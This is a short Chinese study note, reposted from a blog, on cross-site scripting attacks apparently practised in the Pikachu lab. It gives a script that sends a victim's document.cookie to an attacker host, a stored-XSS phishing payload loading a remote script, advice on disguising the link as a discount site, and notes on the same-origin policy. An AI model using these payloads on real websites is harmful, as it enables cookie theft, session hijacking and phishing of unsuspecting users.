首页 > 其他 > 详细

漏洞.doc

时间:2019-04-21 21:24:46      阅读:147      评论:0      收藏:0      [点我收藏+]

cookie获取xss后台使用

   引发用户点击特制url(比如告诉用户这是优惠网),用户点击后进入攻击者指定的自己的页面,返回用户的cookie到攻击者的后台

<script>

document .location=‘http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=‘+ document.cookie;

</script>

 构造的url指定链接是后台存储cookiede页面,页面可以重定向到其他页面,不引起用户的怀疑

 

 

 

 

 

 

 

 

 

xss钓鱼

代码

 

在存在存储型xss漏洞的留言板上输入:<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>

xss获取键盘记录

 

同源策略:两个不同域名之间(跨域)不能使用js进行相互操作。如需进行跨域操作,要进行特殊配置,比如通过:header(“Access-Control-Allow-Origin:x.com)  //允许被x.com跨域请求

下面这些标签不受同源策略限制:

<script src=”..”>//js,加载到本地

<img src=”..”>

<link href=”..”>//css

<iframe src=”..”>//任意资源

 

漏洞.doc

原文:https://www.cnblogs.com/bieff-66/p/10746948.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!